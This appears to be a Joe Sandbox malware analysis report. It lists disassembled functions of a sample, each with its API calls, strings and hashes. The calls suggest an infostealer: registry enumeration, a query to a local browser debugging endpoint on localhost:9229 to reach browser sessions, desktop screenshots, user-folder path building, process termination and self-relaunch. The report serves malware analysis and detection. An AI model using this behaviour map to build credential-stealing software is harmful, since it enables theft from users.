                                  • Instruction Fuzzy Hash: 0C028230A01265CFCB27DF66C989BABF7B5AF40704F198269E4099B2E1D771DC42CB90
                                  Function 00403760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 004071E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004071FE
                                  • RegOpenKeyExA.ADVAPI32(?,011AC100,00000000,00020019,?), ref: 004037BD
                                  • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004037F7
                                  • wsprintfA.USER32 ref: 00403822
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00403840
                                  • RegCloseKey.ADVAPI32(?), ref: 0040384E
                                  • RegCloseKey.ADVAPI32(?), ref: 00403858
                                  • RegQueryValueExA.ADVAPI32(?,011B0250,00000000,000F003F,?,?), ref: 004038A1
                                  • lstrlen.KERNEL32(?), ref: 004038B6
                                  • RegQueryValueExA.ADVAPI32(?,011B0310,00000000,000F003F,?,00000400), ref: 00403927
                                  • RegCloseKey.ADVAPI32(?), ref: 00403972
                                  • RegCloseKey.ADVAPI32(?), ref: 00403989
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 13140697-3278919252
                                  • Opcode ID: ebd26e1e2f66de5366cda43bc64cdb722f872cbb5ad9e4d9118251aed817c11c
                                  • Instruction ID: a34c7b01e72f70baf1425b426d841e61fa37e636740a9a96e53d5cda63d94ee5
                                  • Opcode Fuzzy Hash: ebd26e1e2f66de5366cda43bc64cdb722f872cbb5ad9e4d9118251aed817c11c
                                  • Instruction Fuzzy Hash: 4C918DB2D002089FCB10DF95D9809DEBBB9FB48311F14816EE509BB291D735AE42CBA4
                                  Function 003E90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenA.WININET(0040CFEC,00000001,00000000,00000000,00000000), ref: 003E90DF
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003E90FC
                                  • InternetCloseHandle.WININET(00000000), ref: 003E9109
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 003E9166
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 003E9197
                                  • InternetCloseHandle.WININET(00000000), ref: 003E91A2
                                  • InternetCloseHandle.WININET(00000000), ref: 003E91A9
                                  • strlen.MSVCRT ref: 003E91BA
                                  • strlen.MSVCRT ref: 003E91ED
                                  • strlen.MSVCRT ref: 003E922E
                                  • strlen.MSVCRT ref: 003E924C
                                    • Part of subcall function 003E8980: std::_Xinvalid_argument.LIBCPMT ref: 003E8996
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 1530259920-2144369209
                                  • Opcode ID: 75b68257f5d742b59c460e158bde2dbb5eb723a797bdb3235a93862a6c001899
                                  • Instruction ID: 02ed76d2760dcf6393566e759f30f9b2e68b5fbf6c0cbfc4c6290c44557837bc
                                  • Opcode Fuzzy Hash: 75b68257f5d742b59c460e158bde2dbb5eb723a797bdb3235a93862a6c001899
                                  • Instruction Fuzzy Hash: 83511471A00209ABDB10DFA9DC45BEEB7BADB48310F14056AF504E72C0DBB4EA4487A5
                                  Function 00401660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 004016A1
                                  • lstrcpy.KERNEL32(00000000,0119A7D8), ref: 004016CC
                                  • lstrlen.KERNEL32(?), ref: 004016D9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 004016F6
                                  • lstrcat.KERNEL32(00000000,?), ref: 00401704
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0040172A
                                  • lstrlen.KERNEL32(011AFFA0), ref: 0040173F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00401762
                                  • lstrcat.KERNEL32(00000000,011AFFA0), ref: 0040176A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401792
                                  • ShellExecuteEx.SHELL32(?), ref: 004017CD
                                  • ExitProcess.KERNEL32 ref: 00401803
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                  • String ID: <
                                  • API String ID: 3579039295-4251816714
                                  • Opcode ID: 628332a43d1889205ecfa3d76c60dac61ab26086b0a6a45b622152ab51d564d5
                                  • Instruction ID: 3707f99e78a314aaf3b2ce33182cf9b4afbd173721e217d04ea13e4d21a3792d
                                  • Opcode Fuzzy Hash: 628332a43d1889205ecfa3d76c60dac61ab26086b0a6a45b622152ab51d564d5
                                  • Instruction Fuzzy Hash: B8513D71901269AFDB11DFA5DC84ADFB7FEAF48300F049136A505E73A1DB74AE018B94
                                  Function 003FEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FEFE4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FF012
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003FF026
                                  • lstrlen.KERNEL32(00000000), ref: 003FF035
                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 003FF053
                                  • StrStrA.SHLWAPI(00000000,?), ref: 003FF081
                                  • lstrlen.KERNEL32(?), ref: 003FF094
                                  • lstrlen.KERNEL32(00000000), ref: 003FF0B2
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 003FF0FF
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 003FF13F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$AllocLocal
                                  • String ID: ERROR
                                  • API String ID: 1803462166-2861137601
                                  • Opcode ID: 39f35adc7335fbabc636cab2ff75d2675bffdfa39fbc12929c8befaccd14f956
                                  • Instruction ID: 2b9be2e85d231dc20192d449e1a81bfe7d995da93fd9b377d79761f4a058224f
                                  • Opcode Fuzzy Hash: 39f35adc7335fbabc636cab2ff75d2675bffdfa39fbc12929c8befaccd14f956
                                  • Instruction Fuzzy Hash: C6519D329102599FCB23AF35DC49ABF77A9AF44740F0A5269FD069B252DF70DC018B90
                                  Function 003EA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetEnvironmentVariableA.KERNEL32(011A8B28,00619BD8,0000FFFF), ref: 003EA026
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003EA053
                                  • lstrlen.KERNEL32(00619BD8), ref: 003EA060
                                  • lstrcpy.KERNEL32(00000000,00619BD8), ref: 003EA08A
                                  • lstrlen.KERNEL32(00414C4C), ref: 003EA095
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EA0B2
                                  • lstrcat.KERNEL32(00000000,00414C4C), ref: 003EA0BE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EA0E4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003EA0EF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003EA114
                                  • SetEnvironmentVariableA.KERNEL32(011A8B28,00000000), ref: 003EA12F
                                  • LoadLibraryA.KERNEL32(011963B8), ref: 003EA143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: b039cc5b3234fbe0b027f480838e8cefe23c303764c5e9cf27c4a144d56aa10d
                                  • Instruction ID: 357cf7775d1f376ab5d6cc6016050c394863fe2830ec39307e7bf5a5cb281c38
                                  • Opcode Fuzzy Hash: b039cc5b3234fbe0b027f480838e8cefe23c303764c5e9cf27c4a144d56aa10d
                                  • Instruction Fuzzy Hash: 7A910730600A60CFD7329FB6DC44AA737B6EB54704F469619E5059B2E2EFB5EC40CB92
                                  Function 003FC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FC8A2
                                  • lstrcpy.KERNEL32(00000000,0040CFEC), ref: 003FC8D1
                                  • lstrlen.KERNEL32(00000000), ref: 003FC8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003FC932
                                  • StrCmpCA.SHLWAPI(00000000,00414C3C), ref: 003FC943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 2acc5770ca3dfbfedab4c7c59c6a7953e1f366384cc512e7f927cc80386b9505
                                  • Instruction ID: 22ddfb218498c7c9a1760dbcb7f2f5abc96609a7ac6d3025058715749bb7e351
                                  • Opcode Fuzzy Hash: 2acc5770ca3dfbfedab4c7c59c6a7953e1f366384cc512e7f927cc80386b9505
                                  • Instruction Fuzzy Hash: 6A61F571D6022E9BCF12DFB5CA45AFF7BB8BF09340F056669E901E7241D77499018BA0
                                  Function 00404500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 95memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0040451A
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,003F4F39), ref: 00404545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040454C
                                  • wsprintfW.USER32 ref: 0040455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004045CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004045D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 004045E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                  • String ID: 9O?$%hs$9O?
                                  • API String ID: 3729781310-603848071
                                  • Opcode ID: dd7c7bf093b23909dd1f630d2ae005ec159efbe995383b21abe9ac696592c3aa
                                  • Instruction ID: d3ff1c69a8a70ed81f16582ef68c754677de820195cc8d042596073032452dcf
                                  • Opcode Fuzzy Hash: dd7c7bf093b23909dd1f630d2ae005ec159efbe995383b21abe9ac696592c3aa
                                  • Instruction Fuzzy Hash: E5316172A00205BFDB10DBE4DC45FDE7779BF49701F14406AFA05E7180DB746A418BA9
                                  Function 004041E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00400CF0), ref: 00404276
                                  • GetDesktopWindow.USER32 ref: 00404280
                                  • GetWindowRect.USER32(00000000,?), ref: 0040428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 004042BF
                                  • GetHGlobalFromStream.COMBASE(00400CF0,?), ref: 00404336
                                  • GlobalLock.KERNEL32(?), ref: 00404340
                                  • GlobalSize.KERNEL32(?), ref: 0040434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000007B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235862582.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236225795.00000000008D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236372652.0000000000A72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2236397868.0000000000A73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_3e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: bf43bbbb08d4d1949c93ac61ab4844275c2d7a428ac7bd678f2999b10c60c2c2
                                  • Instruction ID: 831a1f4a07f1d6522b72b7a0e9c12577ac808ff0edbba2508f4af4fe1b9ceef0
                                  • Opcode Fuzzy Hash: bf43bbbb08d4d1949c93ac61ab4844275c2d7a428ac7bd678f2999b10c60c2c2
                                  • Instruction Fuzzy Hash: DF514F75A10218AFDB10DFA4DC85AEE77B9EF48301F14912AF905E7290DB74AD01CBA1
                                  Function 003FDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,011B04A8), ref: 003FE00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 003FE037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 003FE07D
                                  • lstrcat.KERNEL32(?,?), ref: 003FE098
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0AC
                                  • lstrcat.KERNEL32(?,0119A6E8), ref: 003FE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 003FE0D4
                                  • lstrcat.KERNEL32(?,011AF238), ref: 003FE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003FE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 003FE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2235656893.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                  • Associated: 00000000.00000002.2235640432.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000046E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235656893.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2235837924.000000000062A000.00000004.00000001.01000000.00000003.sdmpDownload File
